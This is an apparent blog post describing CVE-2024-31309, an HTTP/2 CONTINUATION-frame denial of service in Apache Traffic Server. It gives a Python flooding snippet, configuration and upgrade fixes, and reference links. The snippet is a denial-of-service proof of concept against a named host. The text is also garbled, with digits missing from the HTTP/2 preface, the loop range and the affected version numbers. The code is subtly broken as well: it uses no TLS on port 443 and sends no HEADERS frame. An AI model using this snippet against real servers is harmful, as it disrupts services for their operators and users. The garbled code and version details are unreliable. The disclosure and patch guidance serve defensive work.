CVE-2024-31309 - HTTP/2 CONTINUATION DoS Attack Consumes Excessive Resources in Apache Traffic Server

In this long read, we will be discussing the recently discovered vulnerability, CVE-2024-31309, affecting Apache Traffic Server (ATS). This vulnerability allows an attacker to perform a Denial of Service (DoS) attack by sending multiple HTTP/2 CONTINUATION frames, leading to excessive resource consumption on the server. The affected versions include ATS 8.. through 8.1.9 and ATS 9.. through 9.2.3.

This post will cover the details of the vulnerability, a code snippet to demonstrate the exploit, the available solutions to address this issue, and links to original references and resources.

Vulnerability Details

The vulnerability lies in the handling of HTTP/2 CONTINUATION frames by the affected versions of Apache Traffic Server. Exploiting this weakness can result in a DoS attack, consuming a large number of resources on the server and potentially causing downtime or degraded performance of the web services.

Code Snippet

The following code snippet sends a large number of CONTINUATION frames to the target server, demonstrating the exploit:

import socket

target = ("example.com", 443)
http2_preface = b'PRI * HTTP/2.\r\n\r\nSM\r\n\r\n'

sock = socket.create_connection(target)
sock.sendall(http2_preface)

stream_id = 1
header_block_fragment = b'\x88'  # The minimum CONTINUATION payload
continuation_frame = b'\x00\x00\x01'  # Length
continuation_frame += b'\x09'  # CONTINUATION frame type
continuation_frame += b'\x00'  # No flags
continuation_frame += b'\x00\x00\x00'  # Set the stream ID

for i in range(, 10000):
    sock.sendall(continuation_frame + header_block_fragment)

Solution and Fixes

To mitigate the impact of this vulnerability, users can set a new configuration setting, proxy.config.http2.max_continuation_frames_per_minute, to limit the number of CONTINUATION frames allowed per minute. It is essential to note that ATS does have a fixed amount of memory a request can use, and this limit was adhered to in previous releases.

The recommended solution is to upgrade to ATS 8.1.10 or ATS 9.2.4, which have fixes for this issue in place.

For more information on this vulnerability, refer to the following sources

1. Apache Traffic Server Mailing List Announcement: https://lists.apache.org/thread/7o7v5eq4209f2fzpt3ychr5f56tmlzcw

2. ATS GitHub Issue: https://github.com/apache/trafficserver/issues/7548

3. CVE Information: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-31309

Conclusion

CVE-2024-31309 demonstrates the need for continuous security updates and monitoring of server-side software. By upgrading to the latest versions or implementing the recommended configuration changes, administrators can ensure that their Apache Traffic Server deployments remain secure against this type of resource-consuming DoS attack.

Timeline

Published on: 04/10/2024 12:15:09 UTC
Last modified on: 04/28/2024 22:15:45 UTC